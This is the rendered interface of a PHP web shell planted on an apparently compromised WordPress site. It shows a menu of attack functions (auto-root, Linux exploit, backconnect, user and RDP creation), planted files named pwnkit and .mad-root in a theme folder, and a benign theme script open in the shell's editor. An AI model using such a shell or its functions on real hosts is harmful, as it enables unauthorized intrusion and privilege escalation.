Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
enliven /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
custom-admin.js
3.98
KB
-rw-r--r--
customizer.js
1.68
KB
-rw-r--r--
html5shiv.js
9.95
KB
-rw-r--r--
media-picker.js
5.13
KB
-rw-r--r--
navigation.js
1.44
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
respond.min.js
4.48
KB
-rw-r--r--
respond.src.js
8.79
KB
-rw-r--r--
scripts.js
611
B
-rw-r--r--
scrollreveal.js
23.29
KB
-rw-r--r--
scrollreveal.min.js
7.25
KB
-rw-r--r--
skip-link-focus-fix.js
751
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : customizer.js
/** * Theme Customizer enhancements for a better user experience. * * Contains handlers to make Theme Customizer preview reload changes asynchronously. */ ( function( $ ) { // Site title and description. wp.customize( 'blogname', function( value ) { value.bind( function( to ) { $( '.site-title a' ).text( to ); } ); } ); wp.customize( 'blogdescription', function( value ) { value.bind( function( to ) { $( '.site-description' ).text( to ); } ); } ); // Header text color. wp.customize( 'header_textcolor', function( value ) { value.bind( function( to ) { if ( 'blank' === to ) { $( '.site-title, .site-description' ).css( { 'clip': 'rect(1px, 1px, 1px, 1px)', 'position': 'absolute' } ); } else { $( '.site-title a, .site-description' ).css( { 'clip': 'auto', 'color': to, 'position': 'relative' } ); } } ); } ); // Post sidebar position. /* wp.customize( 'enliven_post_sidebar_position', function( value ) { value.bind( function( to ) { if ( 'left' === to ) { $( 'body' ).removeClass( 'sidebar-right' ).addClass( 'sidebar-left' ); } else { $( 'body' ).removeClass( 'sidebar-left' ).addClass( 'sidebar-right' ); } } ); } ); // Page sidebar position. wp.customize( 'enliven_page_sidebar_position', function( value ) { value.bind( function.( to ) { if ( 'left' === to ) { $( 'body' ).removeClass( 'sidebar-right' ).addClass( 'sidebar-left' ); } else { $( 'body' ).removeClass( 'sidebar-left' ).addClass( 'sidebar-right' ); } } ); }*/ (function($) { $('.enl-drcn-head').click(function() { console.log(this); $(this).next().slideToggle(300); }); })(jQuery); } )( jQuery );
Close